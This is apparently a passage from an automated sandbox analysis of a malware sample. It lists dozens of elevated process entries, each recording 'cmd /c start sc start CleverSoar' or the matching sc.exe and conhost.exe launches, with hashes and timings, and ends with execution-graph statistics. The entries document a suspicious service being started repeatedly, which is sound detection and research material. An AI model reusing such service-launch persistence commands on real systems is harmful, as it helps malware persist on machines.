                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:44
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:45
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:46
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:47
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:48
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:49
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:50
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:51
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:52
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:53
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:54
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:55
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:56
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:57
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:58
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:59
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:60
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:61
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:62
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:63
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:64
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:65
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:66
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:67
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:68
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:69
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:70
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:71
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:72
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:73
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:74
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:75
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:76
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:77
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:78
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:79
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:80
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:81
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:82
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:83
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:84
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:85
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:86
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:87
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:88
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:89
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:90
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:91
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:92
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:93
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:94
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:95
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:96
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:97
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:98
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:99
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:100
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:101
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:102
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:103
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:104
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:105
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:106
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:107
                            Start time:07:03:19
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:108
                            Start time:07:03:19
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:1.9%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:15.8%
                              Total number of Nodes:778
                              Total number of Limit Nodes:10
